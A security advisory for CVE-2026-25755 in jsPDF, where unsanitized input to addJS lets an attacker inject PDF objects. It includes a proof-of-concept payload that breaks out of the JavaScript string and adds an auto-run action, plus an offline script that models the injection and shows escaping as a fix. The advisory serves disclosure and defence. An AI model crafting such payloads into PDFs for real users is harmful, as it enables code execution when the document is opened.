CVE-2026-25755: jsPDF has a PDF Object Injection via Unsanitized Input in addJS Method
User control of the argument of the addJS method allows an attacker to inject arbitrary PDF objects into the generated document. By crafting a payload that escapes the JavaScript string delimiter, an attacker can execute malicious actions or alter the document structure, impacting any user who opens the generated PDF.
import { jsPDF } from "jspdf";
const doc = new jsPDF();
// Payload:
// 1. ")" closes the JS string.
// 2. ">>" closes the current dictionary.
// 3. /AA ... injects an "Additional Action" that executes on focus/open.
const maliciousPayload = "console.log('test');) >> /AA << /O << /S /JavaScript /JS (app.alert('Hacked!')) >> >>";
doc.addJS(maliciousPayload);
doc.save("vulnerable.pdf");
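The delimiter escape described above can be checked offline with a small model. This is an added example, not jsPDF's code or its fix: `buildJsAction` is an assumed, simplified stand-in for how the script ends up inside a PDF literal string, and all function names are hypothetical.

```javascript
// Added example: simplified model of the injection, not jsPDF's source code.

// Assumption: the script is written into a PDF literal string like this.
function buildJsAction(js) {
  return `<< /S /JavaScript /JS (${js}) >>`;
}

// PDF literal-string escaping: backslash first, then both parentheses.
function escapePdfLiteral(text) {
  return text.replace(/\\/g, "\\\\").replace(/\(/g, "\\(").replace(/\)/g, "\\)");
}

// Index just past the ")" that closes the literal string opened at `open`,
// honouring backslash escapes and balanced nested parentheses.
function literalEnd(pdf, open) {
  let depth = 0;
  for (let i = open; i < pdf.length; i++) {
    const c = pdf[i];
    if (c === "\\") { i++; continue; } // skip the escaped character
    if (c === "(") depth++;
    else if (c === ")" && --depth === 0) return i + 1;
  }
  return -1; // unterminated string
}

// Everything a PDF parser reads as object syntax after the /JS string.
function tailAfterJsString(action) {
  const open = action.indexOf("/JS (") + 4; // position of the opening "("
  const end = literalEnd(action, open);
  return end < 0 ? null : action.slice(end);
}

// Undo the three escapes above, as a PDF reader would before running the script.
function decodeLiteral(body) {
  return body.replace(/\\([\\()])/g, "$1");
}

// Payload taken from the proof of concept on this page.
const payload =
  "console.log('test');) >> /AA << /O << /S /JavaScript /JS (app.alert('Hacked!')) >> >>";

const rawTail = tailAfterJsString(buildJsAction(payload));
const safeTail = tailAfterJsString(buildJsAction(escapePdfLiteral(payload)));

console.log("unescaped, parsed as PDF syntax:", JSON.stringify(rawTail));
console.log("escaped, parsed as PDF syntax:  ", JSON.stringify(safeTail));
```

Escaping must happen at exactly one layer: if the library version in use already escapes the string, escaping it again in application code would corrupt the script.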
References
- github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-25755.md
- github.com/advisories/GHSA-9vjf-qc39-jprp
- github.com/parallax/jsPDF
- github.com/parallax/jsPDF/commit/56b46d45b052346f5995b005a34af5dcdddd5437
- github.com/parallax/jsPDF/releases/tag/v4.2.0
- github.com/parallax/jsPDF/security/advisories/GHSA-9vjf-qc39-jprp
- nvd.nist.gov/vuln/detail/CVE-2026-25755